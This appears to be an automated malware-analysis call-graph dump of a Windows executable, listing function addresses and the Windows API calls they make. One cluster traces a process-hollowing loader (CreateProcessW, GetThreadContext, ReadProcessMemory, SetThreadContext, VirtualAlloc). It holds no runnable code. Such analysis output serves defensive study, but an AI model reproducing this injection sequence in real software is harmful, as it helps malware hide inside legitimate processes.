99003->98997 99003->98998 99003->99001 99004->99001 99005->99002 99007 ef0fe6 Mailbox 59 API calls 99006->99007 99008 ee40e0 99007->99008 99009 ee1c7e 59 API calls 99008->99009 99010 ee3b8d 99009->99010 99011 ee3b23 99010->99011 99028 ee3f20 99011->99028 99014 ee3b34 99016 ee3b65 99014->99016 99035 ee4220 99014->99035 99041 ee408f 99014->99041 99016->98964 99017 ee124d MultiByteToWideChar 99016->99017 99018 ee12ba 99017->99018 99019 ee1273 99017->99019 99020 ee19e1 59 API calls 99018->99020 99021 ef0fe6 Mailbox 59 API calls 99019->99021 99024 ee12ac 99020->99024 99022 ee1288 MultiByteToWideChar 99021->99022 99056 ee1364 99022->99056 99024->98964 99025->98953 99026->98953 99027->98965 99029 f205e0 99028->99029 99030 ee3f31 99028->99030 99031 ee1c7e 59 API calls 99029->99031 99030->99014 99032 f205ea 99031->99032 99033 ef0fe6 Mailbox 59 API calls 99032->99033 99034 f205f6 99033->99034 99036 ee4293 99035->99036 99040 ee422e 99035->99040 99050 ee42ae SetFilePointerEx 99036->99050 99037 ee4256 99037->99014 99039 ee4266 ReadFile 99039->99037 99039->99040 99040->99037 99040->99039 99042 f20692 99041->99042 99043 ee40a3 99041->99043 99045 ee1c7e 59 API calls 99042->99045 99051 ee3fce 99043->99051 99047 f2069d 99045->99047 99046 ee40af 99046->99014 99048 ef0fe6 Mailbox 59 API calls 99047->99048 99049 f206b2 _memmove 99048->99049 99050->99040 99052 ee3fe6 99051->99052 99055 ee3fdf _memmove 99051->99055 99053 ef0fe6 Mailbox 59 API calls 99052->99053 99054 f20622 99052->99054 99053->99055 99055->99046 99057 ee13e6 99056->99057 99058 ee1373 99056->99058 99059 ee1981 59 API calls 99057->99059 99058->99057 99061 ee137f 99058->99061 99060 ee1391 _memmove 99059->99060 99060->99024 99062 ee1389 99061->99062 99063 ee13b7 99061->99063 99064 ee1b7c 59 API calls 99062->99064 99065 ee1c7e 59 API calls 99063->99065 99064->99060 99066 ee13c1 99065->99066 99067 ef0fe6 Mailbox 59 API calls 99066->99067 99067->99060 99069 ee4312 CreateFileW 99068->99069 99070 f206fc 99068->99070 99071 ee4334 99069->99071 99070->99071 99072 f20702 CreateFileW 99070->99072 99071->98977 99072->99071 99073 f20728 99072->99073 99074 ee410a 2 API calls 99073->99074 99075 f20733 99074->99075 99075->99071 99077 ee3c7c 99076->99077 99078 f20549 99076->99078 99079 ee410a 2 API calls 99077->99079 99088 ee3d0b 99077->99088 99082 ee41d6 2 API calls 99078->99082 99078->99088 99080 ee3c9e 99079->99080 99081 ee433f 59 API calls 99080->99081 99083 ee3ca8 99081->99083 99082->99088 99083->99078 99084 ee3cb5 99083->99084 99085 ef0fe6 Mailbox 59 API calls 99084->99085 99086 ee3cc0 99085->99086 99087 ee433f 59 API calls 99086->99087 99089 ee3ccb 99087->99089 99088->98979 99090 ee4220 2 API calls 99089->99090 99091 ee3cf8 99090->99091 99092 ee410a 2 API calls 99091->99092 99092->99088 99093->98982 99094->98984 99096 ef0fe6 Mailbox 59 API calls 99095->99096 99097 ee1652 99096->99097 99098 ef0fe6 Mailbox 59 API calls 99097->99098 99099 ee1660 99098->99099 99099->98835 99101 ee1bef _memmove 99100->99101 99103 ee1bdc 99100->99103 99101->98857 99102 ef0fe6 Mailbox 59 API calls 99102->99101 99103->99101 99103->99102 99105 ee1207 59 API calls 99104->99105 99106 f2fbb0 99105->99106 99107 ee162d 59 API calls 99106->99107 99108 f2fbc4 99107->99108 99116 f2fbe6 99108->99116 99148 f2f903 99108->99148 99111 f2f903 61 API calls 99111->99116 99112 ee1462 59 API calls 99112->99116 99113 f2fc60 99115 ee1462 59 API calls 99113->99115 99114 ee1462 59 API calls 99114->99116 99117 f2fc79 99115->99117 99116->99111 99116->99113 99116->99114 99118 ee17e0 59 API calls 99116->99118 99119 ee17e0 59 API calls 99117->99119 99118->99116 99120 f2fc85 99119->99120 99121 ee1bcc 59 API calls 99120->99121 99122 f2fc94 Mailbox 99120->99122 99121->99122 99122->98864 99123->98842 99125 ee14ce 99124->99125 99126 ee1471 99124->99126 99127 ee1981 59 API calls 99125->99127 99126->99125 99128 ee147c 99126->99128 99129 ee149f _memmove 99127->99129 99130 ee1497 99128->99130 99131 f1f1de 99128->99131 99129->98854 99132 ee1b7c 59 API calls 99130->99132 99133 ee1c7e 59 API calls 99131->99133 99132->99129 99134 f1f1e8 99133->99134 99135 ef0fe6 Mailbox 59 API calls 99134->99135 99136 f1f208 99135->99136 99138 f1f401 99137->99138 99139 ee17f2 99137->99139 99163 f287f9 59 API calls _memmove 99138->99163 99157 ee1680 99139->99157 99142 ee17fe 99142->98860 99143 f1f40b 99144 ee1c9c 59 API calls 99143->99144 99145 f1f413 Mailbox 99144->99145 99146->98846 99147->98856 99149 f2f92e __wsetenvp 99148->99149 99150 f2f96d 99149->99150 99152 f2f963 99149->99152 99154 f2fa14 99149->99154 99150->99112 99150->99116 99152->99150 99155 ee14db 61 API calls 99152->99155 99154->99150 99156 ee14db 61 API calls 99154->99156 99155->99152 99156->99154 99158 ee1692 99157->99158 99161 ee16ba _memmove 99157->99161 99159 ef0fe6 Mailbox 59 API calls 99158->99159 99158->99161 99160 ee176f _memmove 99159->99160 99162 ef0fe6 Mailbox 59 API calls 99160->99162 99161->99142 99162->99160 99163->99143 99164->98870 99166 ee1207 59 API calls 99165->99166 99167 ef012f 99166->99167 99168 ee1207 59 API calls 99167->99168 99169 ef0137 99168->99169 99170 ee1207 59 API calls 99169->99170 99171 ef013f 99170->99171 99172 ee1207 59 API calls 99171->99172 99173 ef0147 99172->99173 99174 ef017b 99173->99174 99175 f2627d 99173->99175 99176 ee1462 59 API calls 99174->99176 99177 ee1c9c 59 API calls 99175->99177 99178 ef0189 99176->99178 99179 f26286 99177->99179 99180 ee1981 59 API calls 99178->99180 99181 ee19e1 59 API calls 99179->99181 99182 ef0193 99180->99182 99184 ef01be 99181->99184 99183 ee1462 59 API calls 99182->99183 99182->99184 99187 ef01b4 99183->99187 99185 ef01fe 99184->99185 99188 ef01dd 99184->99188 99198 f262a6 99184->99198 99186 ee1462 59 API calls 99185->99186 99189 ef020f 99186->99189 99190 ee1981 59 API calls 99187->99190 99221 ee1609 99188->99221 99193 ef0221 99189->99193 99196 ee1c9c 59 API calls 99189->99196 99190->99184 99191 f26376 99194 ee1821 59 API calls 99191->99194 99197 ef0231 99193->99197 99199 ee1c9c 59 API calls 99193->99199 99211 f26333 99194->99211 99196->99193 99201 ef0238 99197->99201 99203 ee1c9c 59 API calls 99197->99203 99198->99191 99200 f2635f 99198->99200 99210 f262dd 99198->99210 99199->99197 99200->99191 99206 f2634a 99200->99206 99204 ee1c9c 59 API calls 99201->99204 99213 ef023f Mailbox 99201->99213 99202 ee1462 59 API calls 99202->99185 99203->99201 99204->99213 99205 ee1609 59 API calls 99205->99211 99209 ee1821 59 API calls 99206->99209 99207 f2633b 99208 ee1821 59 API calls 99207->99208 99208->99211 99209->99211 99210->99207 99214 f26326 99210->99214 99211->99185 99211->99205 99224 ee153b 59 API calls 2 library calls 99211->99224 99213->98887 99215 ee1821 59 API calls 99214->99215 99215->99211 99216->98901 99217->98912 99218->98911 99219->98908 99220->98908 99222 ee1aa4 59 API calls 99221->99222 99223 ee1614 99222->99223 99223->99185 99223->99202 99224->99211 99226 ed4d37 84 API calls 99225->99226 99227 f4d203 99226->99227 99246 f4d24a Mailbox 99227->99246 99263 f4de8e 99227->99263 99229 f4d4a2 99230 f4d617 99229->99230 99234 f4d4b0 99229->99234 99313 f4dfb1 92 API calls Mailbox 99230->99313 99233 f4d626 99233->99234 99236 f4d632 99233->99236 99276 f4d057 99234->99276 99235 ed4d37 84 API calls 99254 f4d29b Mailbox 99235->99254 99236->99246 99241 f4d4e9 99291 ef0e38 99241->99291 99244 f4d503 99297 f3a48d 89 API calls 4 library calls 99244->99297 99245 f4d51c 99298 ed47be 99245->99298 99246->98915 99250 f4d50e GetCurrentProcess TerminateProcess 99250->99245 99254->99229 99254->99235 99254->99246 99295 f3fc0d 59 API calls 2 library calls 99254->99295 99296 f4d6c8 61 API calls 2 library calls 99254->99296 99255 f4d68d 99255->99246 99259 f4d6a1 FreeLibrary 99255->99259 99256 f4d554 99310 f4dd32 107 API calls _free 99256->99310 99259->99246 99261 f4d565 99261->99255 99311 ed4230 59 API calls Mailbox 99261->99311 99312 ed523c 59 API calls 99261->99312 99314 f4dd32 107 API calls _free 99261->99314 99264 ee1aa4 59 API calls 99263->99264 99265 f4dea9 CharLowerBuffW 99264->99265 99266 f2f903 61 API calls 99265->99266 99267 f4deca 99266->99267 99269 ee1207 59 API calls 99267->99269 99274 f4df05 Mailbox 99267->99274 99270 f4dee2 99269->99270 99271 ee1462 59 API calls 99270->99271 99272 f4def9 99271->99272 99273 ee1981 59 API calls 99272->99273 99273->99274 99275 f4df41 Mailbox 99274->99275 99315 f4d6c8 61 API calls 2 library calls 99274->99315 99275->99254 99277 f4d072 99276->99277 99281 f4d0c7 99276->99281 99278 ef0fe6 Mailbox 59 API calls 99277->99278 99280 f4d094 99278->99280 99279 ef0fe6 Mailbox 59 API calls 99279->99280 99280->99279 99280->99281 99282 f4e139 99281->99282 99283 f4e362 Mailbox 99282->99283 99290 f4e15c _strcat _wcscpy __wsetenvp 99282->99290 99283->99241 99284 ed5087 59 API calls 99284->99290 99285 ed50d5 59 API calls 99285->99290 99286 ed502b 59 API calls 99286->99290 99287 ed4d37 84 API calls 99287->99290 99288 ef593c 58 API calls std::exception::_Copy_str 99288->99290 99290->99283 99290->99284 99290->99285 99290->99286 99290->99287 99290->99288 99316 f35e42 61 API calls 2 library calls 99290->99316 99292 ef0e4d 99291->99292 99293 ef0ee5 VirtualAlloc 99292->99293 99294 ef0eb3 99292->99294 99293->99294 99294->99244 99294->99245 99295->99254 99296->99254 99297->99250 99299 ed47c6 99298->99299 99300 ef0fe6 Mailbox 59 API calls 99299->99300 99301 ed47d4 99300->99301 99302 ed47e0 99301->99302 99317 ed46ec 59 API calls Mailbox 99301->99317 99304 ed4540 99302->99304 99318 ed4650 99304->99318 99306 ed454f 99307 ef0fe6 Mailbox 59 API calls 99306->99307 99308 ed45eb 99306->99308 99307->99308 99308->99261 99309 ed4230 59 API calls Mailbox 99308->99309 99309->99256 99310->99261 99311->99261 99312->99261 99313->99233 99314->99261 99315->99275 99316->99290 99317->99302 99319 ed4659 Mailbox 99318->99319 99320 f0d6ec 99319->99320 99325 ed4663 99319->99325 99321 ef0fe6 Mailbox 59 API calls 99320->99321 99323 f0d6f8 99321->99323 99322 ed466a 99322->99306 99325->99322 99326 ed5190 59 API calls Mailbox 99325->99326 99326->99325 99327->98737 99328->98735 99329->98610 99330 3af04d8 99333 3af04df 99330->99333 99331 3af04eb 99333->99331 99334 3af09c4 ExitProcess 99333->99334 99335 3af09cb 99333->99335 99336 3af09e1 99335->99336 99351 3af0005 GetPEB 99336->99351 99338 3af0b74 99338->99333 99339 3af0b9f CreateProcessW 99340 3af0bb3 GetThreadContext 99339->99340 99343 3af0bae 99339->99343 99341 3af0bd6 ReadProcessMemory 99340->99341 99340->99343 99341->99343 99349 3af0a5a 99341->99349 99343->99338 99379 3af12a3 99343->99379 99345 3af105c 11 API calls 99345->99349 99347 3af0e3b SetThreadContext 99347->99343 99347->99349 99349->99338 99349->99339 99349->99343 99349->99345 99349->99347 99350 3af12a3 11 API calls 99349->99350 99352 3af0f44 99349->99352 99361 3af1336 99349->99361 99370 3af11f4 99349->99370 99350->99349 99351->99349 99353 3af0f5f 99352->99353 99388 3af007a GetPEB 99353->99388 99355 3af0f80 99356 3af1038 99355->99356 99357 3af0f88 99355->99357 99405 3af1779 10 API calls 99356->99405 99390 3af156b 99357->99390 99360 3af101f 99360->99349 99362 3af1351 99361->99362 99363 3af007a GetPEB 99362->99363 99364 3af1372 99363->99364 99365 3af137a 99364->99365 99366 3af1404 99364->99366 99368 3af156b 10 API calls 99365->99368 99413 3af17c1 10 API calls 99366->99413 99369 3af13eb 99368->99369 99369->99349 99371 3af120f 99370->99371 99372 3af007a GetPEB 99371->99372 99373 3af1230 99372->99373 99374 3af127a 99373->99374 99375 3af1234 99373->99375 99414 3af179d 10 API calls 99374->99414 99376 3af156b 10 API calls 99375->99376 99378 3af126f 99376->99378 99378->99349 99380 3af12b6 99379->99380 99381 3af007a GetPEB 99380->99381 99382 3af12d7 99381->99382 99383 3af12db 99382->99383 99384 3af1321 99382->99384 99385 3af156b 10 API calls 99383->99385 99415 3af17af 10 API calls 99384->99415 99387 3af1316 99385->99387 99387->99338 99389 3af009c 99388->99389 99389->99355 99406 3af0005 GetPEB 99390->99406 99392 3af15b7 99407 3af0019 GetPEB 99392->99407 99395 3af1644 99396 3af1655 VirtualAlloc 99395->99396 99398 3af1719 99395->99398 99397 3af166b ReadFile 99396->99397 99396->99398 99397->99398 99399 3af1680 VirtualAlloc 99397->99399 99400 3af175e 99398->99400 99401 3af1753 VirtualFree 99398->99401 99399->99398 99402 3af16a3 99399->99402 99400->99360 99401->99400 99402->99398 99403 3af170c VirtualFree 99402->99403 99404 3af1708 FindCloseChangeNotification 99402->99404 99403->99398 99404->99403 99405->99360 99406->99392 99408 3af002c 99407->99408 99410 3af0041 CreateFileW 99408->99410 99411 3af0149 GetPEB 99408->99411 99410->99395 99410->99398 99412 3af016f 99411->99412 99412->99408 99413->99369 99414->99378 99415->99387 99416 ed1055 99421 ed2a19 99416->99421 99419 ef2f70 __cinit 67 API calls 99420 ed1064 99419->99420 99422 ee1207 59 API calls 99421->99422 99423 ed2a87 99422->99423 99428 ed1256 99423->99428 99426 ed2b24 99427 ed105a 99426->99427 99431 ed13f8 99426->99431 99427->99419 99437 ed1284 99428->99437 99432 ed140a _memmove 99431->99432 99433 ed1430 99431->99433 99434 ef0fe6 Mailbox 59 API calls 99432->99434 99436 ef0fe6 Mailbox 59 API calls 99433->99436 99435 ed1410 99434->99435 99435->99426 99436->99432 99438 ed1291 99437->99438 99439 ed1275 99437->99439 99438->99439 99440 ed1298 RegOpenKeyExW 99438->99440 99439->99426 99440->99439 99441 ed12b2 RegQueryValueExW 99440->99441 99442 ed12e8 RegCloseKey 99441->99442 99443 ed12d3 99441->99443 99442->99439 99443->99442 99444 3af0227 99455 3af0005 GetPEB 99444->99455 99446 3af02bf 99447 3af0454 99446->99447 99448 3af0470 CreateFileW 99446->99448 99448->99447 99449 3af049a VirtualAlloc ReadFile 99448->99449 99449->99447 99452 3af04d2 99449->99452 99451 3af04eb 99452->99451 99453 3af09cb 15 API calls 99452->99453 99454 3af09c4 ExitProcess 99452->99454 99453->99452 99455->99446 99456 ed1066 99457 ed106c 99456->99457 99458 ef2f70 __cinit 67 API calls 99457->99458 99459 ed1076 99458->99459 99460 ed1016 99465 ee5ce7 99460->99465 99463 ef2f70 __cinit 67 API calls 99464 ed1025 99463->99464 99466 ef0fe6 Mailbox 59 API calls 99465->99466 99467 ee5cef 99466->99467 99468 ed101b 99467->99468 99472 ee5f39 99467->99472 99468->99463 99473 ee5cfb 99472->99473 99474 ee5f42 99472->99474 99476 ee5d13 99473->99476 99475 ef2f70 __cinit 67 API calls 99474->99475 99475->99473 99477 ee1207 59 API calls 99476->99477 99478 ee5d2b GetVersionExW 99477->99478 99479 ee1821 59 API calls 99478->99479 99480 ee5d6e 99479->99480 99481 ee1981 59 API calls 99480->99481 99492 ee5d9b 99480->99492 99482 ee5d8f 99481->99482 99483 ee133d 59 API calls 99482->99483 99483->99492 99484 ee5e00 GetCurrentProcess IsWow64Process 99485 ee5e19 99484->99485 99487 ee5e2f 99485->99487 99488 ee5e98 GetSystemInfo 99485->99488 99486 f21098 99500 ee55f0 99487->99500 99489 ee5e65 99488->99489 99489->99468 99492->99484 99492->99486 99493 ee5e8c GetSystemInfo 99496 ee5e56 99493->99496 99494 ee5e41 99495 ee55f0 2 API calls 99494->99495 99497 ee5e49 GetNativeSystemInfo 99495->99497 99496->99489 99498 ee5e5c FreeLibrary 99496->99498 99497->99496 99498->99489 99501 ee5619 99500->99501 99502 ee55f9 LoadLibraryA 99500->99502 99501->99493 99501->99494 99502->99501 99503 ee560a GetProcAddress 99502->99503 99503->99501 99504 ed9bb6 99505 ed86e0 284 API calls 99504->99505 99506 ed9bc4 99505->99506 99507 ef7e83 99508 ef7e8f _doexit 99507->99508 99544 efa038 GetStartupInfoW 99508->99544 99511 ef7e94 99546 ef8dac GetProcessHeap 99511->99546 99512 ef7eec 99513 ef7ef7 99512->99513 99629 ef7fd3 58 API calls 3 library calls 99512->99629 99547 ef9d16 99513->99547 99516 ef7efd 99517 ef7f08 __RTC_Initialize 99516->99517 99630 ef7fd3 58 API calls 3 library calls 99516->99630 99568 efd802 99517->99568 99520 ef7f17 99521 ef7f23 GetCommandLineW 99520->99521 99631 ef7fd3 58 API calls 3 library calls 99520->99631 99587 f05153 GetEnvironmentStringsW 99521->99587 99524 ef7f22 99524->99521 99527 ef7f3d 99528 ef7f48 99527->99528 99632 ef32e5 58 API calls 3 library calls 99527->99632 99597 f04f88 99528->99597 99531 ef7f4e 99532 ef7f59 99531->99532 99633 ef32e5 58 API calls 3 library calls 99531->99633 99611 ef331f 99532->99611 99535 ef7f61 99536 ef7f6c __wwincmdln 99535->99536 99634 ef32e5 58 API calls 3 library calls 99535->99634 99617 ee5f8b 99536->99617 99539 ef7f80 99540 ef7f8f 99539->99540 99635 ef3588 58 API calls _doexit 99539->99635 99636 ef3310 58 API calls _doexit 99540->99636 99543 ef7f94 _doexit 99545 efa04e 99544->99545 99545->99511 99546->99512 99637 ef33b7 RtlEncodePointer 99547->99637 99549 ef9d1b 99643 ef9f6c InitializeCriticalSectionAndSpinCount ___lock_fhandle 99549->99643 99551 ef9d20 99552 ef9d24 99551->99552 99645 ef9fba TlsAlloc 99551->99645 99644 ef9d8c 61 API calls 2 library calls 99552->99644 99555 ef9d29 99555->99516 99556 ef9d36 99556->99552 99557 ef9d41 99556->99557 99646 ef8a05 99557->99646 99559 ef9d4e 99560 ef9d83 99559->99560 99652 efa016 TlsSetValue 99559->99652 99654 ef9d8c 61 API calls 2 library calls 99560->99654 99563 ef9d62 99563->99560 99565 ef9d68 99563->99565 99564 ef9d88 99564->99516 99653 ef9c63 58 API calls 4 library calls 99565->99653 99567 ef9d70 GetCurrentThreadId 99567->99516 99569 efd80e _doexit 99568->99569 99570 ef9e3b __lock 58 API calls 99569->99570 99571 efd815 99570->99571 99572 ef8a05 __calloc_crt 58 API calls 99571->99572 99574 efd826 99572->99574 99573 efd891 GetStartupInfoW 99581 efd8a6 99573->99581 99584 efd9d5 99573->99584 99574->99573 99575 efd831 _doexit @_EH4_CallFilterFunc@8 99574->99575 99575->99520 99576 efda9d 99670 efdaad LeaveCriticalSection _doexit 99576->99670 99578 ef8a05 __calloc_crt 58 API calls 99578->99581 99579 efda22 GetStdHandle 99579->99584 99580 efda35 GetFileType 99580->99584 99581->99578 99583 efd8f4 99581->99583 99581->99584 99582 efd928 GetFileType 99582->99583 99583->99582 99583->99584 99668 efa05b InitializeCriticalSectionAndSpinCount 99583->99668 99584->99576 99584->99579 99584->99580 99669 efa05b InitializeCriticalSectionAndSpinCount 99584->99669 99588 f05164 99587->99588 99589 ef7f33 99587->99589 99590 ef8a4d __malloc_crt 58 API calls 99588->99590 99593 f04d4b GetModuleFileNameW 99589->99593 99592 f0518a _memmove 99590->99592 99591 f051a0 FreeEnvironmentStringsW 99591->99589 99592->99591 99594 f04d7f _wparse_cmdline 99593->99594 99595 ef8a4d __malloc_crt 58 API calls 99594->99595 99596 f04dbf _wparse_cmdline 99594->99596 99595->99596 99596->99527 99598 f04fa1 __wsetenvp 99597->99598 99602 f04f99 99597->99602 99599 ef8a05 __calloc_crt 58 API calls 99598->99599 99607 f04fca __wsetenvp 99599->99607 99600 f05021 99601 ef2f85 _free 58 API calls 99600->99601 99601->99602 99602->99531 99603 ef8a05 __calloc_crt 58 API calls 99603->99607 99604 f05046 99606 ef2f85 _free 58 API calls 99604->99606 99606->99602 99607->99600 99607->99602 99607->99603 99607->99604 99608 f0505d 99607->99608 99671 f04837 58 API calls ___strgtold12_l 99607->99671 99672 ef8ff6 IsProcessorFeaturePresent 99608->99672 99610 f05069 99610->99531 99613 ef332b __IsNonwritableInCurrentImage 99611->99613 99695 efa701 99613->99695 99614 ef3349 __initterm_e 99615 ef2f70 __cinit 67 API calls 99614->99615 99616 ef3368 _doexit __IsNonwritableInCurrentImage 99614->99616 99615->99616 99616->99535 99618 ee6044 99617->99618 99619 ee5fa5 99617->99619 99618->99539 99620 ee5fdf IsThemeActive 99619->99620 99698 ef359c 99620->99698 99624 ee600b 99710 ee5f00 SystemParametersInfoW SystemParametersInfoW 99624->99710 99626 ee6017 99711 ee5240 99626->99711 99628 ee601f SystemParametersInfoW 99628->99618 99629->99513 99630->99517 99631->99524 99635->99540 99636->99543 99655 ef35f7 99637->99655 99639 ef33c8 __init_pointers __initp_misc_winsig 99656 efa754 EncodePointer 99639->99656 99641 ef33e0 __init_pointers 99642 efa0c9 34 API calls 99641->99642 99642->99549 99643->99551 99644->99555 99645->99556 99648 ef8a0c 99646->99648 99649 ef8a47 99648->99649 99651 ef8a2a 99648->99651 99657 f05426 99648->99657 99649->99559 99651->99648 99651->99649 99665 efa362 Sleep 99651->99665 99652->99563 99653->99567 99654->99564 99655->99639 99656->99641 99658 f05431 99657->99658 99663 f0544c 99657->99663 99659 f0543d 99658->99659 99658->99663 99666 ef8d58 58 API calls __getptd_noexit 99659->99666 99661 f0545c HeapAlloc 99662 f05442 99661->99662 99661->99663 99662->99648 99663->99661 99663->99662 99667 ef35d1 DecodePointer 99663->99667 99665->99651 99666->99662 99667->99663 99668->99583 99669->99584 99670->99575 99671->99607 99673 ef9001 99672->99673 99678 ef8e89 99673->99678 99677 ef901c 99677->99610 99679 ef8ea3 _memset ___raise_securityfailure 99678->99679 99680 ef8ec3 IsDebuggerPresent 99679->99680 99686 efa385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99680->99686 99683 ef8f87 ___raise_securityfailure 99687 efc826 99683->99687 99684 ef8faa 99685 efa370 GetCurrentProcess TerminateProcess 99684->99685 99685->99677 99686->99683 99688 efc82e 99687->99688 99689 efc830 IsProcessorFeaturePresent 99687->99689 99688->99684 99691 f05b3a 99689->99691 99694 f05ae9 5 API calls 2 library calls 99691->99694 99693 f05c1d 99693->99684 99694->99693 99696 efa704 EncodePointer 99695->99696 99696->99696 99697 efa71e 99696->99697 99697->99614 99699 ef9e3b __lock 58 API calls 99698->99699 99700 ef35a7 DecodePointer EncodePointer 99699->99700 99763 ef9fa5 LeaveCriticalSection 99700->99763 99702 ee6004 99703 ef3604 99702->99703 99704 ef360e 99703->99704 99705 ef3628 99703->99705 99704->99705 99764 ef8d58 58 API calls __getptd_noexit 99704->99764 99705->99624 99707 ef3618 99765 ef8fe6 9 API calls ___strgtold12_l 99707->99765 99709 ef3623 99709->99624 99710->99626 99712 ee524d __ftell_nolock 99711->99712 99713 ee1207 59 API calls 99712->99713 99714 ee5258 GetCurrentDirectoryW 99713->99714 99766 ee4ec8 99714->99766 99716 ee527e IsDebuggerPresent 99717 ee528c 99716->99717 99718 f20b21 MessageBoxA 99716->99718 99719 f20b39 99717->99719 99720 ee52a0 99717->99720 99718->99719 99961 ee314d 59 API calls Mailbox 99719->99961 99834 ee31bf 99720->99834 99723 f20b49 99731 f20b5f SetCurrentDirectoryW 99723->99731 99725 ee52be GetFullPathNameW 99727 ee1821 59 API calls 99725->99727 99726 ee535f SetCurrentDirectoryW 99729 ee536c Mailbox 99726->99729 99728 ee52f9 99727->99728 99850 edbbc6 99728->99850 99729->99628 99731->99729 99733 ee5314 99734 ee531e 99733->99734 99962 f34f1c AllocateAndInitializeSid CheckTokenMembership FreeSid 99733->99962 99866 ee514c GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 99734->99866 99737 f20b7c 99737->99734 99740 f20b8d 99737->99740 99742 ef00cf 61 API calls 99740->99742 99741 ee5328 99743 ee533d 99741->99743 99874 ee59d3 99741->99874 99744 f20b95 99742->99744 99885 edbc70 99743->99885 99747 ee1a36 59 API calls 99744->99747 99749 f20ba2 99747->99749 99751 f20ba9 99749->99751 99752 f20bce 99749->99752 99750 ee5358 99750->99726 99755 ee1900 59 API calls 99751->99755 99754 ee1900 59 API calls 99752->99754 99756 f20bca GetForegroundWindow ShellExecuteW 99754->99756 99757 f20bb4 99755->99757 99763->99702 99764->99707 99765->99709 99767 ee1207 59 API calls 99766->99767 99768 ee4ede 99767->99768 99963 ee5420 99768->99963 99770 ee4efc 99771 ee19e1 59 API calls 99770->99771 99772 ee4f10 99771->99772 99773 ee1c9c 59 API calls 99772->99773 99774 ee4f1b 99773->99774 99977 ed477a 99774->99977 99777 ee1a36 59 API calls 99778 ee4f34 99777->99778 99779 ed39be 68 API calls 99778->99779 99780 ee4f44 Mailbox 99779->99780 99781 ee1a36 59 API calls 99780->99781 99782 ee4f68 99781->99782 99783 ed39be 68 API calls 99782->99783 99784 ee4f77 Mailbox 99783->99784 99785 ee1207 59 API calls 99784->99785 99786 ee4f94 99785->99786 99980 ee55bc 99786->99980 99790 ee4fae 99791 f20a54 99790->99791 99792 ee4fb8 99790->99792 99793 ee55bc 59 API calls 99791->99793 99794 ef312d _W_store_winword 60 API calls 99792->99794 99795 f20a68 99793->99795 99796 ee4fc3 99794->99796 99798 ee55bc 59 API calls 99795->99798 99796->99795 99797 ee4fcd 99796->99797 99799 ef312d _W_store_winword 60 API calls 99797->99799 99800 f20a84 99798->99800 99801 ee4fd8 99799->99801 99803 ef00cf 61 API calls 99800->99803 99801->99800 99802 ee4fe2 99801->99802 99804 ef312d _W_store_winword 60 API calls 99802->99804 99805 f20aa7 99803->99805 99806 ee4fed 99804->99806 99807 ee55bc 59 API calls 99805->99807 99808 ee4ff7 99806->99808 99809 f20ad0 99806->99809 99810 f20ab3 99807->99810 99811 ee501b 99808->99811 99814 ee1c9c 59 API calls 99808->99814 99812 ee55bc 59 API calls 99809->99812 99813 ee1c9c 59 API calls 99810->99813 99818 ed47be 59 API calls 99811->99818 99815 f20aee 99812->99815 99816 f20ac1 99813->99816 99817 ee500e 99814->99817 99819 ee1c9c 59 API calls 99815->99819 99820 ee55bc 59 API calls 99816->99820 99821 ee55bc 59 API calls 99817->99821 99822 ee502a 99818->99822 99823 f20afc 99819->99823 99820->99809 99821->99811 99824 ed4540 59 API calls 99822->99824 99825 ee55bc 59 API calls 99823->99825 99826 ee5038 99824->99826 99827 f20b0b 99825->99827 99996 ed43d0 99826->99996 99827->99827 99829 ed477a 59 API calls 99831 ee5055 99829->99831 99830 ed43d0 59 API calls 99830->99831 99831->99829 99831->99830 99832 ee55bc 59 API calls 99831->99832 99833 ee509b Mailbox 99831->99833 99832->99831 99833->99716 99835 ee31cc __ftell_nolock 99834->99835 99836 f20314 _memset 99835->99836 99837 ee31e5 99835->99837 99839 f20330 GetOpenFileNameW 99836->99839 99838 ef0284 60 API calls 99837->99838 99840 ee31ee 99838->99840 99841 f2037f 99839->99841 100010 ef09c5 99840->100010 99843 ee1821 59 API calls 99841->99843 99845 f20394 99843->99845 99845->99845 99847 ee3203 100028 ee278a 99847->100028 99851 edbbd3 __ftell_nolock 99850->99851 100750 ee2cb2 99851->100750 99853 edbbd8 99854 edbc52 99853->99854 100761 edc770 89 API calls 99853->100761 99854->99723 99854->99733 99856 edbbe5 99856->99854 100762 edf5a7 91 API calls Mailbox 99856->100762 99858 edbbee 99858->99854 99859 edbbf2 GetFullPathNameW 99858->99859 99860 ee1821 59 API calls 99859->99860 99861 edbc1e 99860->99861 99862 ee1821 59 API calls 99861->99862 99863 edbc2b 99862->99863 99864 f13587 _wcscat 99863->99864 99865 ee1821 59 API calls 99863->99865 99865->99854 99867 f20b10 99866->99867 99868 ee51b6 LoadImageW RegisterClassExW 99866->99868 100768 ee5f5b LoadImageW EnumResourceNamesW 99867->100768 100767 ed3411 7 API calls 99868->100767 99871 ee523a 99873 ee50db CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99871->99873 99872 f20b19 99873->99741 99875 ee59fe _memset 99874->99875 100769 ee5800 99875->100769 99886 f1359f 99885->99886 99897 edbc95 99885->99897 99961->99723 99962->99737 99964 ee542d __ftell_nolock 99963->99964 99965 ee1821 59 API calls 99964->99965 99968 ee5590 Mailbox 99964->99968 99967 ee545f 99965->99967 99966 ee1609 59 API calls 99966->99967 99967->99966 99976 ee5495 Mailbox 99967->99976 99968->99770 99969 ee1609 59 API calls 99969->99976 99970 ee5563 99970->99968 99971 ee1a36 59 API calls 99970->99971 99972 ee5584 99971->99972 99974 ee4c94 59 API calls 99972->99974 99973 ee1a36 59 API calls 99973->99976 99974->99968 99975 ee4c94 59 API calls 99975->99976 99976->99968 99976->99969 99976->99970 99976->99973 99976->99975 99978 ef0fe6 Mailbox 59 API calls 99977->99978 99979 ed4787 99978->99979 99979->99777 99981 ee55df 99980->99981 99982 ee55c6 99980->99982 99984 ee1821 59 API calls 99981->99984 99983 ee1c9c 59 API calls 99982->99983 99985 ee4fa0 99983->99985 99984->99985 99986 ef312d 99985->99986 99987 ef31ae 99986->99987 99988 ef3139 99986->99988 100007 ef31c0 60 API calls 3 library calls 99987->100007 99995 ef315e 99988->99995 100005 ef8d58 58 API calls __getptd_noexit 99988->100005 99991 ef31bb 99991->99790 99992 ef3145 100006 ef8fe6 9 API calls ___strgtold12_l 99992->100006 99994 ef3150 99994->99790 99995->99790 99997 f0d6c9 99996->99997 99998 ed43e7 99996->99998 99997->99998 100009 ed40cb 59 API calls Mailbox 99997->100009 100000 ed44ef 99998->100000 100001 ed44e8 99998->100001 100002 ed4530 99998->100002 100000->99831 